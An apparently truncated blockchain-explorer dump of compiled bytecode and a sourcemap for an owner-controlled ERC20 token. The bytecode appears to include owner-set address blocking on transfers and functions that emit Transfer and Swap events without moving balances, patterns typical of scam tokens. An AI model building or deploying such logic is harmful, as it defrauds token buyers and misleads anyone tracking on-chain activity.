50602002016020810190610927919061183c565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061097157610970611ab3565b5b9050602002013560405161098591906116f3565b60405180910390a3808061099890611b0d565b9150506108b6565b50505050505050565b6109b1610ffb565b6109ba5f611469565b565b5f5b84849050811015610b1b578484828181106109dc576109db611ab3565b5b90506020020160208101906109f1919061183c565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8225f86865f604051610a539493929190611c0c565b60405180910390a360085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610aa657610aa5611ab3565b5b9050602002016020810190610abb919061183c565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610b0091906116f3565b60405180910390a38080610b1390611b0d565b9150506109be565b505050505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b5990611a83565b80601f0160208091040260200160405190810160405280929190818152602001828054610b8590611a83565b8015610bd05780601f10610ba757610100808354040283529160200191610bd0565b820191905f5260205f20905b815481529060010190602001808311610bb357829003601f168201915b5050505050905090565b5f80610be4610e31565b90505f610bf18286610cdb565b905083811015610c36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2d90611cbf565b60405180910390fd5b610c438286868403610e38565b60019250505092915050565b5f80610c59610e31565b9050610c66818585611104565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cce91906116f3565b60405180910390a3505050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610d65610ffb565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610dd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dca90611d4d565b60405180910390fd5b610ddc81611469565b50565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ea6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9d90611ddb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f14576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0b90611e69565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fee91906116f3565b60405180910390a3505050565b611003610e31565b73ffffffffffffffffffffffffffffffffffffffff16611021610b23565b73ffffffffffffffffffffffffffffffffffffffff1614611077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106e90611ed1565b60405180910390fd5b565b5f6110848484610cdb565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110fe57818110156110f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e790611f39565b60405180910390fd5b6110fd8484848403610e38565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611172576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116990611fc7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d790612055565b60405180910390fd5b6111eb83838361152a565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561126f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611266906120e3565b60405180910390fd5b60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168061130a575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15611365576001151560055f9054906101000a900460ff16151514611364576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135b90612124565b60405180910390fd5b5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161145091906116f3565b60405180910390a361146384848461152f565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561156b578082015181840152602081019050611550565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61159082611534565b61159a818561153e565b93506115aa81856020860161154e565b6115b381611576565b840191505092915050565b5f6020820190508181035f8301526115d68184611586565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61160f826115e6565b9050919050565b61161f81611605565b8114611629575f80fd5b50565b5f8135905061163a81611616565b92915050565b5f819050919050565b61165281611640565b811461165c575f80fd5b50565b5f8135905061166d81611649565b92915050565b5f8060408385031215611689576116886115de565b5b5f6116968582860161162c565b92505060206116a78582860161165f565b9150509250929050565b5f8115159050919050565b6116c5816116b1565b82525050565b5f6020820190506116de5f8301846116bc565b92915050565b6116ed81611640565b82525050565b5f6020820190506117065f8301846116e4565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261172d5761172c61170c565b5b8235905067ffffffffffffffff81111561174a57611749611710565b5b60208301915083602082028301111561176657611765611714565b5b9250929050565b5f8060208385031215611783576117826115de565b5b5f83013567ffffffffffffffff8111156117a05761179f6115e2565b5b6117ac85828601611718565b92509250509250929050565b5f805f606084860312156117cf576117ce6115de565b5b5f6117dc8682870161162c565b93505060206117ed8682870161162c565b92505060406117fe8682870161165f565b9150509250925092565b5f60ff82169050919050565b61181d81611808565b82525050565b5f6020820190506118365f830184611814565b92915050565b5f60208284031215611851576118506115de565b5b5f61185e8482850161162c565b91505092915050565b5f805f805f608086880312156118805761187f6115de565b5b5f61188d8882890161162c565b955050602086013567ffffffffffffffff8111156118ae576118ad6115e2565b5b6118ba88828901611718565b945094505060406118cd8882890161165f565b92505060606118de8882890161165f565b9150509295509295909350565b5f8083601f840112611900576118ff61170c565b5b8235905067ffffffffffffffff81111561191d5761191c611710565b5b60208301915083602082028301111561193957611938611714565b5b9250929050565b5f805f805f806060878903121561195a576119596115de565b5b5f87013567ffffffffffffffff811115611977576119766115e2565b5b61198389828a01611718565b9650965050602087013567ffffffffffffffff8111156119a6576119a56115e2565b5b6119b289828a01611718565b9450945050604087013567ffffffffffffffff8111156119d5576119d46115e2565b5b6119e189828a016118eb565b92509250509295509295509295565b6119f981611605565b82525050565b5f602082019050611a125f8301846119f0565b92915050565b5f8060408385031215611a2e57611a2d6115de565b5b5f611a3b8582860161162c565b9250506020611a4c8582860161162c565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611a9a57607f821691505b602082108103611aad57611aac611a56565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611b1782611640565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611b4957611b48611ae0565b5b600182019050919050565b5f611b5e82611640565b9150611b6983611640565b9250828201905080821115611b8157611b80611ae0565b5b92915050565b5f819050919050565b5f819050919050565b5f611bb3611bae611ba984611b87565b611b90565b611640565b9050919050565b611bc381611b99565b82525050565b5f608082019050611bdc5f8301876116e4565b611be96020830186611bba565b611bf66040830185611bba565b611c0360608301846116e4565b95945050505050565b5f608082019050611c1f5f830187611bba565b611c2c60208301866116e4565b611c3960408301856116e4565b611c466060830184611bba565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611ca960258361153e565b9150611cb482611c4f565b604082019050919050565b5f6020820190508181035f830152611cd681611c9d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611d3760268361153e565b9150611d4282611cdd565b604082019050919050565b5f6020820190508181035f830152611d6481611d2b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611dc560248361153e565b9150611dd082611d6b565b604082019050919050565b5f6020820190508181035f830152611df281611db9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611e5360228361153e565b9150611e5e82611df9565b604082019050919050565b5f6020820190508181035f830152611e8081611e47565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611ebb60208361153e565b9150611ec682611e87565b602082019050919050565b5f6020820190508181035f830152611ee881611eaf565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611f23601d8361153e565b9150611f2e82611eef565b602082019050919050565b5f6020820190508181035f830152611f5081611f17565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611fb160258361153e565b9150611fbc82611f57565b604082019050919050565b5f6020820190508181035f830152611fde81611fa5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61203f60238361153e565b915061204a82611fe5565b604082019050919050565b5f6020820190508181035f83015261206c81612033565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6120cd60268361153e565b91506120d882612073565b604082019050919050565b5f6020820190508181035f8301526120fa816120c1565b9050919050565b50565b5f61210f5f8361153e565b915061211a82612101565b5f82019050919050565b5f6020820190508181035f83015261213b81612104565b905091905056fea264697066735822122032779bf25f9e83cf4c4d8726ffdbbe36261a55a98f97c215c3ee7472c1ab50ca64736f6c63430008140033

Deployed Bytecode Sourcemap

82:167:7:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2206:98:3;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4482:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3293:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13639:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5241:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3143:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15133:101;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5922:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13834:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14512:304;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3457:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14277:229;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2459:101:2;;;:::i;:::-;;14822:305:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1836:85:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2417:102:3;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6643:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3778:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14154:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4025:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2709:198:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14041:107:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2206:98;2260:13;2292:5;2285:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2206:98;:::o;4482:197::-;4565:4;4581:13;4597:12;:10;:12::i;:::-;4581:28;;4619:32;4628:5;4635:7;4644:6;4619:8;:32::i;:::-;4668:4;4661:11;;;4482:197;;;;:::o;3293:106::-;3354:7;3380:12;;3373:19;;3293:106;:::o;13639:189::-;1729:13:2;:11;:13::i;:::-;13722:9:3::1;13717:105;13741:11;;:18;;13737:1;:22;13717:105;;;13807:4;13780:8;:24;13789:11;;13801:1;13789:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13780:24;;;;;;;;;;;;;;;;:31;;;;;;;;;;;;;;;;;;13761:3;;;;;:::i;:::-;;;;13717:105;;;;13639:189:::0;;:::o;5241:286::-;5368:4;5384:15;5402:12;:10;:12::i;:::-;5384:30;;5424:38;5440:4;5446:7;5455:6;5424:15;:38::i;:::-;5472:27;5482:4;5488:2;5492:6;5472:9;:27::i;:::-;5516:4;5509:11;;;5241:286;;;;;:::o;3143:91::-;3201:5;3225:2;3218:9;;3143:91;:::o;15133:101::-;1729:13:2;:11;:13::i;:::-;15220:7:3::1;15206:11;;:21;;;;;;;;;;;;;;;;;;15133:101:::0;:::o;5922:234::-;6010:4;6026:13;6042:12;:10;:12::i;:::-;6026:28;;6064:64;6073:5;6080:7;6117:10;6089:25;6099:5;6106:7;6089:9;:25::i;:::-;:38;;;;:::i;:::-;6064:8;:64::i;:::-;6145:4;6138:11;;;5922:234;;;;:::o;13834:201::-;1729:13:2;:11;:13::i;:::-;13928:9:3::1;13923:106;13947:11;;:18;;13943:1;:22;13923:106;;;14013:5;13986:8;:24;13995:11;;14007:1;13995:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13986:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;13967:3;;;;;:::i;:::-;;;;13923:106;;;;13834:201:::0;;:::o;14512:304::-;14629:9;14624:186;14648:11;;:18;;14644:1;:22;14624:186;;;14722:11;;14734:1;14722:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14692:45;;14697:6;14692:45;;;14705:3;14710:1;14713;14716:4;14692:45;;;;;;;;;:::i;:::-;;;;;;;;14778:11;;14790:1;14778:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14756:43;;14765:11;;;;;;;;;;;14756:43;;;14794:4;14756:43;;;;;;:::i;:::-;;;;;;;;14668:3;;;;;:::i;:::-;;;;14624:186;;;;14512:304;;;;;:::o;3457:125::-;3531:7;3557:9;:18;3567:7;3557:18;;;;;;;;;;;;;;;;3550:25;;3457:125;;;:::o;14277:229::-;14397:9;14392:108;14416:5;;:12;;14412:1;:16;14392:108;;;14473:3;;14477:1;14473:6;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14454:35;;14463:5;;14469:1;14463:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14454:35;;;14481:4;;14486:1;14481:7;;;;;;;:::i;:::-;;;;;;;;14454:35;;;;;;:::i;:::-;;;;;;;;14430:3;;;;;:::i;:::-;;;;14392:108;;;;14277:229;;;;;;:::o;2459:101:2:-;1729:13;:11;:13::i;:::-;2523:30:::1;2550:1;2523:18;:30::i;:::-;2459:101::o:0;14822:305:3:-;14941:9;14936:185;14960:11;;:18;;14956:1;:22;14936:185;;;15034:11;;15046:1;15034:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;15004:45;;15009:6;15004:45;;;15017:1;15020:3;15025:4;15031:1;15004:45;;;;;;;;;:::i;:::-;;;;;;;;15093:11;;;;;;;;;;;15068:42;;15077:11;;15089:1;15077:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;15068:42;;;15106:3;15068:42;;;;;;:::i;:::-;;;;;;;;14980:3;;;;;:::i;:::-;;;;14936:185;;;;14822:305;;;;;:::o;1836:85:2:-;1882:7;1908:6;;;;;;;;;;;1901:13;;1836:85;:::o;2417:102:3:-;2473:13;2505:7;2498:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2417:102;:::o;6643:427::-;6736:4;6752:13;6768:12;:10;:12::i;:::-;6752:28;;6790:24;6817:25;6827:5;6834:7;6817:9;:25::i;:::-;6790:52;;6880:15;6860:16;:35;;6852:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6971:60;6980:5;6987:7;7015:15;6996:16;:34;6971:8;:60::i;:::-;7059:4;7052:11;;;;6643:427;;;;:::o;3778:189::-;3857:4;3873:13;3889:12;:10;:12::i;:::-;3873:28;;3911;3921:5;3928:2;3932:6;3911:9;:28::i;:::-;3956:4;3949:11;;;3778:189;;;;:::o;14154:117::-;14254:3;14238:26;;14247:5;14238:26;;;14259:4;14238:26;;;;;;:::i;:::-;;;;;;;;14154:117;;;:::o;4025:149::-;4114:7;4140:11;:18;4152:5;4140:18;;;;;;;;;;;;;;;:27;4159:7;4140:27;;;;;;;;;;;;;;;;4133:34;;4025:149;;;;:::o;2709:198:2:-;1729:13;:11;:13::i;:::-;2817:1:::1;2797:22;;:8;:22;;::::0;2789:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2872:28;2891:8;2872:18;:28::i;:::-;2709:198:::0;:::o;14041:107:3:-;14099:4;14122:8;:19;14131:9;14122:19;;;;;;;;;;;;;;;;;;;;;;;;;14115:26;;14041:107;;;:::o;589:96:2:-;642:7;668:10;661:17;;589:96;:::o;10973:370:3:-;11121:1;11104:19;;:5;:19;;;11096:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11201:1;11182:21;;:7;:21;;;11174:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11283:6;11253:11;:18;11265:5;11253:18;;;;;;;;;;;;;;;:27;11272:7;11253:27;;;;;;;;;;;;;;;:36;;;;11320:7;11304:32;;11313:5;11304:32;;;11329:6;11304:32;;;;;;:::i;:::-;;;;;;;;10973:370;;;:::o;1994:130:2:-;2068:12;:10;:12::i;:::-;2057:23;;:7;:5;:7::i;:::-;:23;;;2049:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1994:130::o;11624:441:3:-;11754:24;11781:25;11791:5;11798:7;11781:9;:25::i;:::-;11754:52;;11840:17;11820:16;:37;11816:243;;11901:6;11881:16;:26;;11873:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11983:51;11992:5;11999:7;12027:6;12008:16;:25;11983:8;:51::i;:::-;11816:243;11744:321;11624:441;;;:::o;7524:900::-;7666:1;7650:18;;:4;:18;;;7642:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;7742:1;7728:16;;:2;:16;;;7720:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;7795:38;7816:4;7822:2;7826:6;7795:20;:38::i;:::-;7844:19;7866:9;:15;7876:4;7866:15;;;;;;;;;;;;;;;;7844:37;;7914:6;7899:11;:21;;7891:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;7977:8;:14;7986:4;7977:14;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;7995:8;:12;8004:2;7995:12;;;;;;;;;;;;;;;;;;;;;;;;;7977:30;7973:72;;;8036:4;8017:23;;:15;;;;;;;;;;;:23;;;8009:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;7973:72;8111:6;8097:11;:20;8079:9;:15;8089:4;8079:15;;;;;;;;;;;;;;;:38;;;;8311:6;8294:9;:13;8304:2;8294:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;8358:2;8343:26;;8352:4;8343:26;;;8362:6;8343:26;;;;;;:::i;:::-;;;;;;;;8380:37;8400:4;8406:2;8410:6;8380:19;:37::i;:::-;7632:792;7524:900;;;:::o;3061:187:2:-;3134:16;3153:6;;;;;;;;;;;3134:25;;3178:8;3169:6;;:17;;;;;;;;;;;;;;;;;;3232:8;3201:40;;3222:8;3201:40;;;;;;;;;;;;3124:124;3061:187;:::o;13359:121:3:-;;;;:::o;12653:120::-;;;;:::o;7:99:8:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:117::-;3907:1;3904;3897:12;3921:117;4030:1;4027;4020:12;4044:117;4153:1;4150;4143:12;4184:568;4257:8;4267:6;4317:3;4310:4;4302:6;4298:17;4294:27;4284:122;;4325:79;;:::i;:::-;4284:122;4438:6;4425:20;4415:30;;4468:18;4460:6;4457:30;4454:117;;;4490:79;;:::i;:::-;4454:117;4604:4;4596:6;4592:17;4580:29;;4658:3;4650:4;4642:6;4638:17;4628:8;4624:32;4621:41;4618:128;;;4665:79;;:::i;:::-;4618:128;4184:568;;;;;:::o;4758:559::-;4844:6;4852;4901:2;4889:9;4880:7;4876:23;4872:32;4869:119;;;4907:79;;:::i;:::-;4869:119;5055:1;5044:9;5040:17;5027:31;5085:18;5077:6;5074:30;5071:117;;;5107:79;;:::i;:::-;5071:117;5220:80;5292:7;5283:6;5272:9;5268:22;5220:80;:::i;:::-;5202:98;;;;4998:312;4758:559;;;;;:::o;5323:619::-;5400:6;5408;5416;5465:2;5453:9;5444:7;5440:23;5436:32;5433:119;;;5471:79;;:::i;:::-;5433:119;5591:1;5616:53;5661:7;5652:6;5641:9;5637:22;5616:53;:::i;:::-;5606:63;;5562:117;5718:2;5744:53;5789:7;5780:6;5769:9;5765:22;5744:53;:::i;:::-;5734:63;;5689:118;5846:2;5872:53;5917:7;5908:6;5897:9;5893:22;5872:53;:::i;:::-;5862:63;;5817:118;5323:619;;;;;:::o;5948:86::-;5983:7;6023:4;6016:5;6012:16;6001:27;;5948:86;;;:::o;6040:112::-;6123:22;6139:5;6123:22;:::i;:::-;6118:3;6111:35;6040:112;;:::o;6158:214::-;6247:4;6285:2;6274:9;6270:18;6262:26;;6298:67;6362:1;6351:9;6347:17;6338:6;6298:67;:::i;:::-;6158:214;;;;:::o;6378:329::-;6437:6;6486:2;6474:9;6465:7;6461:23;6457:32;6454:119;;;6492:79;;:::i;:::-;6454:119;6612:1;6637:53;6682:7;6673:6;6662:9;6658:22;6637:53;:::i;:::-;6627:63;;6583:117;6378:329;;;;:::o;6713:995::-;6826:6;6834;6842;6850;6858;6907:3;6895:9;6886:7;6882:23;6878:33;6875:120;;;6914:79;;:::i;:::-;6875:120;7034:1;7059:53;7104:7;7095:6;7084:9;7080:22;7059:53;:::i;:::-;7049:63;;7005:117;7189:2;7178:9;7174:18;7161:32;7220:18;7212:6;7209:30;7206:117;;;7242:79;;:::i;:::-;7206:117;7355:80;7427:7;7418:6;7407:9;7403:22;7355:80;:::i;:::-;7337:98;;;;7132:313;7484:2;7510:53;7555:7;7546:6;7535:9;7531:22;7510:53;:::i;:::-;7500:63;;7455:118;7612:2;7638:53;7683:7;7674:6;7663:9;7659:22;7638:53;:::i;:::-;7628:63;;7583:118;6713:995;;;;;;;;:::o;7731:568::-;7804:8;7814:6;7864:3;7857:4;7849:6;7845:17;7841:27;7831:122;;7872:79;;:::i;:::-;7831:122;7985:6;7972:20;7962:30;;8015:18;8007:6;8004:30;8001:117;;;8037:79;;:::i;:::-;8001:117;8151:4;8143:6;8139:17;8127:29;;8205:3;8197:4;8189:6;8185:17;8175:8;8171:32;8168:41;8165:128;;;8212:79;;:::i;:::-;8165:128;7731:568;;;;;:::o;8305:1309::-;8463:6;8471;8479;8487;8495;8503;8552:2;8540:9;8531:7;8527:23;8523:32;8520:119;;;8558:79;;:::i;:::-;8520:119;8706:1;8695:9;8691:17;8678:31;8736:18;8728:6;8725:30;8722:117;;;8758:79;;:::i;:::-;8722:117;8871:80;8943:7;8934:6;8923:9;8919:22;8871:80;:::i;:::-;8853:98;;;;8649:312;9028:2;9017:9;9013:18;9000:32;9059:18;9051:6;9048:30;9045:117;;;9081:79;;:::i;:::-;9045:117;9194:80;9266:7;9257:6;9246:9;9242:22;9194:80;:::i;:::-;9176:98;;;;8971:313;9351:2;9340:9;9336:18;9323:32;9382:18;9374:6;9371:30;9368:117;;;9404:79;;:::i;:::-;9368:117;9517:80;9589:7;9580:6;9569:9;9565:22;9517:80;:::i;:::-;9499:98;;;;9294:313;8305:1309;;;;;;;;:::o;9620:118::-;9707:24;9725:5;9707:24;:::i;:::-;9702:3;9695:37;9620:118;;:::o;9744:222::-;9837:4;9875:2;9864:9;9860:18;9852:26;;9888:71;9956:1;9945:9;9941:17;9932:6;9888:71;:::i;:::-;9744:222;;;;:::o;9972:474::-;10040:6;10048;10097:2;10085:9;10076:7;10072:23;10068:32;10065:119;;;10103:79;;:::i;:::-;10065:119;10223:1;10248:53;10293:7;10284:6;10273:9;10269:22;10248:53;:::i;:::-;10238:63;;10194:117;10350:2;10376:53;10421:7;10412:6;10401:9;10397:22;10376:53;:::i;:::-;10366:63;;10321:118;9972:474;;;;;:::o;10452:180::-;10500:77;10497:1;10490:88;10597:4;10594:1;10587:15;10621:4;10618: